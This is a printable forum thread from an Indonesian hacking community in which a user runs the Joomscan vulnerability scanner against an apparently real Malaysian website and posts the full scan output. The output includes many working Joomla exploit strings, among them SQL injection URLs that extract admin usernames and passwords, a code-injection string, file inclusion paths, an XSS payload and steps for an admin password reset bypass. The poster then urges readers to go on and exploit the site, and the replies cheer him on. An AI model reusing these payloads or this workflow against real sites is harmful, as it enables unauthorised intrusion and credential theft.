Joomscan on Dracos - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Penetration Testing Os (https://www.indonesianbacktrack.or.id/forum/forum-170.html) +--- Forum: Dracos-linux (https://www.indonesianbacktrack.or.id/forum/forum-156.html) +---- Forum: Update-tools (https://www.indonesianbacktrack.or.id/forum/forum-157.html) +---- Thread: Joomscan on Dracos (/thread-2960.html) |
Joomscan on Dracos - cassaprodigy - 06-28-2012 it's my first writing on sub forum dracos.. i will test joomscan tool on dracos.. #first i will check update ..|' '|| '|| '||' '|' | .|'''.| '||''|. .|' || '|. '|. .' ||| ||.. ' || || || || || || | | || ''|||. ||...|' '|. || ||| ||| .' ' ' '|. . '|| || ''|...|' | | .|. .||. |'....|' .||. OWASP Joomla! Vulnerability Scanner Database Update © Aung Khant, http://yehg.net/lab Update by: Web-Center, http://web-center.si Remote Database Entries: 623 Remote Last Update: April 4, 2012 ocal Database Entries: 611 Local Last update: February 2, 2012 ~Updating.. ~Done successfully. have fun! Update Note: ~[*] Time Taken: 7 sec ~[*] Send bugs, suggestions, contributions to [email protected] here we go to scanning #now i will test ..|' '|| '|| '||' '|' | .|'''.| '||''|. .|' || '|. '|. .' ||| ||.. ' || || || || || || | | || ''|||. ||...|' '|. || ||| ||| .' ' ' '|. . '|| || ''|...|' | | .|. .||. |'....|' .||. =================================================== OWASP Joomla! Vulnerability Scanner v0.0.4 © Aung Khant, aungkhant]at[yehg.net YGN Ethical Hacker Group, Myanmar, http://yehg.net/lab Update by: Web-Center, http://web-center.si (2011) =================================================== Vulnerability Entries: 623 Last update: April 4, 2012 Use "update" option to update the database Use "check" option to check the scanner update Use "download" option to download the scanner latest version package Use svn co to update the scanner and the database svn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan Target: http://www.situs-target.com.my Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.14 ## NOTE: The Administrator URL was renamed. Bruteforce it. ## ## None of /administrator, /admin, /manage ## ## Checking if the target has deployed an Anti-Scanner measure [!] Scanning Passed ..... OK ## Detecting Joomla! based Firewall ... [!] A Joomla! RS-Firewall (com_rsfirewall/com_firewall) is detected. [!] The vulnerability probing may be logged and protected. [!] A Joomla! J-Firewall (com_jfw) is detected. [!] The vulnerability probing may be logged and protected. [!] A SecureLive Joomla!(mod_securelive/com_securelive) firewall is detected. [!] The vulnerability probing may be logged and protected. [!] A SecureLive Joomla! firewall is detected. [!] The vulnerability probing may be logged and protected. [!] A Joomla! security scanner (com_joomscan/com_joomlascan) is detected. [!] It is likely that webmaster routinely checks insecurities. [!] A security scanner (com_securityscanner/com_securityscan) is detected. [!] A Joomla! GuardXT Security Component is detected. [!] It is likely that webmaster routinely checks for insecurities. [!] A Joomla! JoomSuite Defender is detected. [!] The vulnerability probing may be logged and protected. [!] .htaccess shipped with Joomla! is being deployed for SEO purpose [!] It contains some defensive mod_rewrite rules [!] Payloads that contain strings (mosConfig,base64_encode,<script> GLOBALS,_REQUEST) wil be responsed with 403. ## Fingerprinting in progress ... ~Generic version family ....... [1.5.x] ~1.5.x en-GB.ini revealed [1.5.12 - 1.5.14] * Deduced version range is : [1.5.12 - 1.5.14] ## Fingerprinting done. ## 1 Components Found in front page ## com_mailto Vulnerabilities Discovered ========================== # 1 Info -> Generic: Unprotected Administrator directory Versions Affected: Any Check: /administrator/ Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf Vulnerable? Yes # 2 Info -> Core: Multiple XSS/CSRF Vulnerability Versions Affected: 1.5.9 <= Check: /?1.5.9-x Exploit: A series of XSS and CSRF faults exist in the administrator application. Affected administrator components include com_admin, com_media, com_search. Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities. Vulnerable? No # 3 Info -> Core: JSession SSL Session Disclosure Vulnerability Versions effected: Joomla! 1.5.8 <= Check: /?1.5.8-x Exploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie. This can allow someone monitoring the network to find the cookie related to the session. Vulnerable? No # 4 Info -> Core: Frontend XSS Vulnerability Versions effected: 1.5.10 <= Check: /?1.5.10-x Exploit: Some values were output from the database without being properly escaped. Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin. Vulnerable? No # 5 Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability Versions effected: 1.5.11 <= Check: /libraries/phpxmlrpc/xmlrpcs.php Exploit: /libraries/phpxmlrpc/xmlrpcs.php Vulnerable? No # 6 Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability Versions effected: 1.5.12 <= Check: /libraries/joomla/utilities/compat/php50x.php Exploit: /libraries/joomla/utilities/compat/php50x.php Vulnerable? No # 7 Info -> Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability Versions effected: 1.5.11 <= Check: /?1.5.11-x-http_ref Exploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed. Vulnerable? No # 8 Info -> Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability Versions effected: 1.5.11 <= Check: /?1.5.11-x-php-s3lf Exploit: An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser. Vulnerable? No # 9 Info -> Core: Authentication Bypass Vulnerability Versions effected: Joomla! 1.5.3 <= Check: /administrator/ Exploit: Backend accepts any password for custom Super Administrator when LDAP enabled Vulnerable? No # 10 Info -> Core: Path Disclosure Vulnerability Versions effected: Joomla! 1.5.3 <= Check: /?1.5.3-path-disclose Exploit: Crafted URL can disclose absolute path Vulnerable? No # 11 Info -> Core: User redirected Spamming Vulnerability Versions effected: Joomla! 1.5.3 <= Check: /?1.5.3-spam Exploit: User redirect spam Vulnerable? No # 12 Info -> Core: joomla.php Remote File Inclusion Vulnerability Versions effected: 1.0.0 Check: /includes/joomla.php Exploit: /includes/joomla.php?includepath= Vulnerable? No # 13 Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability Versions effected: 1.0.13 <= Check: /administrator/ Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage. Vulnerable? Yes # 14 Info -> Core: Path Disclosure Vulnerability Versions effected: Joomla! 1.5.12 <= Check: /libraries/joomla/utilities/compat/php50x.php Exploit: /libraries/joomla/utilities/compat/php50x.php Vulnerable? No # 15 Info -> CorePlugin: Xstandard Editor X_CMS_LIBRARY_PATH Local Directory Traversal Vulnerability Versions effected: Joomla! 1.5.8 <= Check: /plugins/editors/xstandard/attachmentlibrary.php Exploit: Submit new header X_CMS_LIBRARY_PATH with value ../ to /plugins/editors/xstandard/attachmentlibrary.php Vulnerable? No # 16 Info -> CoreTemplate: ja_purity XSS Vulnerability Versions effected: 1.5.10 <= Check: /templates/ja_purity/ Exploit: A XSS vulnerability exists in the JA_Purity template which ships with Joomla! 1.5. Vulnerable? No # 17 Info -> CoreLibrary: phpmailer Remote Code Execution Vulnerability Versions effected: Joomla! 1.5.0 Beta/Stable Check: /libraries/phpmailer/phpmailer.php Exploit: N/A Vulnerable? No # 18 Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities Versions effected: Joomla! 1.5.12 Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/ Exploit: While Joomla! team announced only File Upload vulnerability, in fact there are many. See: http://www.milw0rm.com/exploits/9296 Vulnerable? Yes # 19 Info -> CoreComponent: Joomla Remote Admin Password Change Vulnerability Versions Affected: 1.5.5 <= Check: /components/com_user/controller.php Exploit: 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm 2. Write into field "token" char ' and Click OK. 3. Write new password for admin 4. Go to url : target.com/administrator/ 5. Login admin with new password Vulnerable? No # 20 Info -> CoreComponent: com_content SQL Injection Vulnerability Version Affected: Joomla! 1.0.0 <= Check: /components/com_content/ Exploit: /index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Vulnerable? No # 21 Info -> CoreComponent: com_search Remote Code Execution Vulnerability Version Affected: Joomla! 1.5.0 beta 2 <= Check: /components/com_search/ Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B Vulnerable? No # 22 Info -> CoreComponent: com_admin File Inclusion Vulnerability Versions Affected: N/A Check: /administrator/components/com_admin/admin.admin.html.php Exploit: /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path= Vulnerable? No # 23 Info -> CoreComponent: MailTo SQL Injection Vulnerability Versions effected: N/A Check: /components/com_mailto/ Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1 Vulnerable? No # 24 Info -> CoreComponent: com_content Blind SQL Injection Vulnerability Versions effected: Joomla! 1.5.0 RC3 Check: /components/com_content/ Exploit: /index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28 Vulnerable? No # 25 Info -> CoreComponent: com_content XSS Vulnerability Version Affected: Joomla! 1.5.7 <= Check: /components/com_content/ Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc). This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration. Vulnerable? No # 26 Info -> CoreComponent: com_weblinks XSS Vulnerability Version Affected: Joomla! 1.5.7 <= Check: /components/com_weblinks/ Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms). Vulnerable? No # 27 Info -> CoreComponent: com_mailto Email Spam Vulnerability Version Affected: Joomla! 1.5.6 <= Check: /components/com_mailto/ Exploit: The mailto component does not verify validity of the URL prior to sending. Vulnerable? No # 28 Info -> CoreComponent: com_content view=archive SQL Injection Vulnerability Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1 Check: /components/com_content/ Exploit: Unfiltered POST vars - filter, month, year to /index.php?option=com_content&view=archive Vulnerable? No # 29 Info -> CoreComponent: com_content XSS Vulnerability Version Affected: Joomla! 1.5.9 <= Check: /components/com_content/ Exploit: A XSS vulnerability exists in the category view of com_content. Vulnerable? No # 30 Info -> CoreComponent: com_installer CSRF Vulnerability Versions effected: Joomla! 1.5.0 Beta Check: /administrator/components/com_installer/ Exploit: N/A Vulnerable? No # 31 Info -> CoreComponent: com_search Memory Comsumption DoS Vulnerability Versions effected: Joomla! 1.5.0 Beta Check: /components/com_search/ Exploit: N/A Vulnerable? No # 32 Info -> CoreComponent: com_poll (mosmsg) Memory Consumption DOS Vulnerability Versions effected: 1.0.7 <= Check: /components/com_poll/ Exploit: Send request /index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><> Vulnerable? No # 33 Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability Versions effected: N/A Check: /components/com_banners/ Exploit: /index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2 Vulnerable? No # 34 Info -> CoreComponent: com_mailto timeout Vulnerability Versions effected: 1.5.13 <= Check: /components/com_mailto/ Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails. Vulnerable? Yes # 35 Info -> Component: JCE XSS+File Inclusion Vulnerability Versions Affected: 1.0.4<= Check: /components/com_jce/ Exploit: 1) Input passed to the "img", "title", "w", and "h" parameters within jce.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. 2) Input passed to the "plugin" and "file" parameters within jce.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources. Vulnerable? No # 36 Info -> Component: eXtplorer Local Directory Traversal Vulnerability Versions Affected: 2.0.0 RC2 <= Check: /components/com_extplorer/ Exploit: /index.php?com_extplorer-test1 Vulnerable? No # 37 Info -> Component: Dada Mail Manager Component Remote File Inclusion Vulnerability Version Affected: 2.6 <= Check: /administrator/components/ Exploit: /administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]= Vulnerable? No # 38 Info -> Component: cgTestimonial XSS Versions Affected: 2.2 Check: /components/com_cgtestimonial/video.php?url="><script>alert('xss');</script> Exploit: /components/com_cgtestimonial/video.php?url="><script>alert('xss');</script> Vulnerable? N/A # 39 Info -> Component: Component com_newsfeeds SQL injection Versions Affected: Any <= Check: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users-- Exploit: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users-- Vulnerable? No # 40 Info -> Component: Joomla Component com_searchlog SQL Injection Versions Affected: 3.1.0 <= Check: /administrator/index.php?option=com_searchlog&act=log Exploit: /administrator/index.php?option=com_searchlog&act=log Vulnerable? No # 41 Info -> Component: Joomla Component com_djartgallery Multiple Vulnerabilities Versions Affected: 0.9.1 <= Check: /administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+ Exploit: /administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+ Vulnerable? N/A There are 4 vulnerable points in 41 found entries! ~[*] Time Taken: 17 min and 0 sec ~[*] Send bugs, suggestions, contributions to [email protected] OK, that's was test for joomscan.pl after this you can test that's site with you exploit.. enjoy it , thanks to zee eichel and team for this new OS and for give me to test the tool on dracos.. ./cassaprodigy was here RE: Joomscan on Dracos - permana - 06-28-2012 woh . targetnya site malingsia ngeri uy . kaboooooooor akh RE: Joomscan on Dracos - dracos-linux - 06-30-2012 sip bro .. wee will add this to tutorial RE: Joomscan on Dracos - Al - Ayyubi - 06-30-2012 nice target om mantep banget om wkwkwk . . . |